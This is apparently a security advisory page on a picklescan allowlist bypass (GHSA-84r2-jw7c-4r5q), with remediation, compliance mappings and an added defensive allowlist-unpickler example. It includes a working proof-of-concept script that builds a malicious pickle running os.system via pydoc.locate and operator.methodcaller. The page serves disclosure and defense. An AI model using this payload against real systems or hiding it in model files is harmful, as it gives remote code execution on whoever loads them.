GHSA-84r2-jw7c-4r5q: picklescan: Allowlist Bypass evades input filtering

GHSA-84r2-jw7c-4r5q HIGH
Published December 29, 2025
CISO Take

If your ML pipelines use picklescan as a security gate for model files, that control is bypassed — attackers can craft pickle payloads that picklescan rates as Safe or Suspicious instead of Dangerous, achieving RCE on load. Patch to picklescan 0.0.33 immediately and treat any model file scanned by a prior version as unverified. This is a scanner bypass, not a model vulnerability — your security posture has a blind spot right now.

What is the risk?

HIGH. The PoC is public, trivial to execute with standard Python libraries, and targets a security control that organizations deliberately deploy to prevent RCE from malicious model files. The combination of bypassing a safety scanner plus achieving code execution is particularly dangerous because it creates a false sense of security — teams believe they are protected when they are not. Exposure is broad: any organization using picklescan in CI/CD, MLOps pipelines, or data science workflows to validate model files downloaded from external sources.

What systems are affected?

Package: picklescan
Ecosystem: pip
Vulnerable Range: < 0.0.33
Patched: 0.0.33

Do you use picklescan? You're affected.

How severe is it?

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What should I do?

  1. Upgrade picklescan to v0.0.33 immediately — this is the only complete fix.
  2. Audit all pickle files scanned with versions < 0.0.33 in the past 90 days; treat them as potentially unsafe and re-scan.
  3. Implement defense-in-depth: load models in sandboxed/isolated environments (Docker, VM, restricted subprocess) regardless of scan results.
  4. Migrate to SafeTensors format for model distribution — eliminates pickle deserialization risk entirely.
  5. Enforce model provenance: cryptographic hash verification and signed artifact attestation as a secondary control layer.
  6. Detection in SIEM: alert on picklescan logs showing 'Suspicious' results for pydoc or operator modules — under prior versions these were under-flagged RCE payloads.

How is it classified?

Which compliance frameworks are affected?

This advisory is relevant to:

EU AI Act
Art.9 - Risk management system
ISO 42001
A.6.2.6 - AI supply chain management
NIST AI RMF
MANAGE-2.2 - Mechanisms are in place and applied to sustain risk management controls
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-84r2-jw7c-4r5q?

If your ML pipelines use picklescan as a security gate for model files, that control is bypassed — attackers can craft pickle payloads that picklescan rates as Safe or Suspicious instead of Dangerous, achieving RCE on load. Patch to picklescan 0.0.33 immediately and treat any model file scanned by a prior version as unverified. This is a scanner bypass, not a model vulnerability — your security posture has a blind spot right now.

Is GHSA-84r2-jw7c-4r5q actively exploited?

No confirmed active exploitation of GHSA-84r2-jw7c-4r5q has been reported, but organizations should still patch proactively.

How to fix GHSA-84r2-jw7c-4r5q?

  1. Upgrade picklescan to v0.0.33 immediately — this is the only complete fix.
  2. Audit all pickle files scanned with versions < 0.0.33 in the past 90 days; treat them as potentially unsafe and re-scan.
  3. Implement defense-in-depth: load models in sandboxed/isolated environments (Docker, VM, restricted subprocess) regardless of scan results.
  4. Migrate to SafeTensors format for model distribution — eliminates pickle deserialization risk entirely.
  5. Enforce model provenance: cryptographic hash verification and signed artifact attestation as a secondary control layer.
  6. Detection in SIEM: alert on picklescan logs showing 'Suspicious' results for pydoc or operator modules — under prior versions these were under-flagged RCE payloads.

What systems are affected by GHSA-84r2-jw7c-4r5q?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD, model registries.

What is the CVSS score for GHSA-84r2-jw7c-4r5q?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

training pipelines, model serving, MLOps CI/CD, model registries

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0074 Masquerading
AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Art.9
ISO 42001: A.6.2.6
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

### Summary

Currently picklescan only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly:

* pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module).
* operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system.

Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check.

### PoC

Use the provided script to create a malicious pickle file:

```python
import pickle
import pydoc
import operator
import os


class ModuleLocator:
    def __init__(self, module_name):
        self.module_name = module_name

    def __reduce__(self):
        return (pydoc.locate, (self.module_name,))


class RCEPayload:
    def __reduce__(self):
        cmd = "notepad"  # put your payload here
        mc = operator.methodcaller("system", cmd)
        return (mc, (ModuleLocator("os"),))


def generate_exploit():
    payload = RCEPayload()
    try:
        with open("bypass.pkl", "wb") as f:
            f.write(pickle.dumps(payload))
        print("File 'bypass.pkl' created.")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    generate_exploit()
```

The generated payload will not be flagged as dangerous by picklescan but is actually malicious.

```python
import pickle

print("Loading bypass.pkl...")
pickle.load(open("bypass.pkl", "rb"))
```

Script to open the pickle file, demonstrating impact.

### Remediation

The deny-list for these modules must be upgraded from specific functions to a wildcard (*), indicating that any use of these modules is dangerous.

Exploitation Scenario

An attacker targets an organization with an automated MLOps pipeline that pulls pre-trained models from a public registry and scans them with picklescan before loading. The attacker publishes a malicious model to Hugging Face or injects one into an internal registry, embedding a pydoc.locate + operator.methodcaller payload that resolves os.system and executes a reverse shell. picklescan versions before 0.0.33 rate the file as Safe. The CI/CD pipeline loads the model into the training cluster. The attacker now has RCE on GPU infrastructure with access to proprietary model weights, training data, and the ability to inject backdoors into production models before they are deployed.

Weaknesses (CWE)

CWE-184 — Incomplete List of Disallowed Inputs: The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

  • [Implementation] Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

Source: MITRE CWE corpus.
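The CWE-184 guidance above is the fix for the bypass described in the original advisory: instead of enumerating dangerous functions inside pydoc and operator, identify the few globals a weights file legitimately needs and reject everything else. The following added example (not code from the advisory, from picklescan, or from MITRE) walks a pickle's opcodes with pickletools to report every imported global against such an allowlist without loading the file, then enforces the same allowlist at load time through Unpickler.find_class; the allowlist entries and the inert sample pickle that merely references pydoc.locate and operator.methodcaller are constructed for this demo.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

# Example allowlist (an assumption for this demo): the only globals a weights file
# needs. Anything else is rejected, so pydoc.locate needs no deny-list entry.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def extract_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the pickle would import, found without loading it.
    GLOBAL carries "module name"; protocol 4+ emits STACK_GLOBAL and takes both
    from the two strings pushed just before it (memo refs not resolved here)."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without two string operands")
            found.append((strings[-2], strings[-1]))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return found

def disallowed_globals(data: bytes) -> list[tuple[str, str]]:
    """Globals outside the allowlist; an empty list means the file may be loaded."""
    return [g for g in extract_globals(data) if g not in ALLOWED_GLOBALS]

class AllowlistUnpickler(pickle.Unpickler):
    """Load-time layer: refuse any import the static scan could have missed."""
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def safe_load(data: bytes):
    bad = disallowed_globals(data)
    if bad:
        raise pickle.UnpicklingError(f"rejected, disallowed globals: {bad}")
    return AllowlistUnpickler(io.BytesIO(data)).load()

# Constructed samples. BYPASS_SHAPED only names the advisory's globals (no REDUCE): inert, never loaded.
BENIGN = pickle.dumps(OrderedDict(weight=[0.1, 0.2]), protocol=4)
BYPASS_SHAPED = b"\x80\x04\x8c\x05pydoc\x8c\x06locate\x93\x8c\x08operator\x8c\x0cmethodcaller\x93\x86."
```

A file that trips either layer should be quarantined rather than loaded in a sandbox for inspection; the static scan is what a CI gate runs, the Unpickler is what the loading service runs.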

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026
